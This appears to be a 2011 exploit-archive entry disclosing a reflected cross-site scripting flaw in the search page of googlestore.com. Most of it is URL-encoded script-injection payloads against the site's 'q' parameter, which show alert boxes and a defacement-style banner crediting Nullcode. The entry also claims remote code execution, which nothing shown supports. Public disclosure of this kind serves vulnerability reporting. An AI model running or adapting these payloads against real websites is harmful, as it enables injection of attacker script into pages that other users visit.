Google Store Cross Site Scripting



EKU-ID: 203 CVE: OSVDB-ID:
Author: Ivan Published: 2011-05-11 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


 
 Author(s): Ivan Sanchez 

 Product: Google Store

 Web: http://www.googlestore.com/googlesearch.aspx?category= [1]

 Evil Function:  

 -------------------
 googlesearch.aspx?

 Exploiting:
 --------------

 http://www.googlestore.com/googlesearch.aspx?category=  XSS & Remote
Execution Code  

 Real case only to check the bug :


http://www.googlestore.com/googlesearch.aspx?category=http://www.googlestore.com/googlesearch.aspx?category=all&q=%3E%3Cscript%3Ealert%28%27Xss%27%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EBy%2BNullcode.com.ar%3C%2Fh1%3E%3C%2Fmarquee%3E&x=20&y=10

http://www.googlestore.com/googlesearch.aspx?category=all&q=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&x=25">

[2]

 Many Thanks

 Ing. Ivan Javier Sanchez 

 Ivan.Sanchez@nullcode.com.ar 
 http://www.linkedin.com/in/nullcode 

Links:
------
[1] http://www.googlestore.com/googlesearch.aspx?category=
[2]
http://www.googlestore.com/googlesearch.aspx?category=all&q=%3E%3Cscript%3Ealert%28%27Xss%27%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EBy%2BNullcode.com.ar%3C%2Fh1%3E%3C%2Fmarquee%3E&x=20&y=10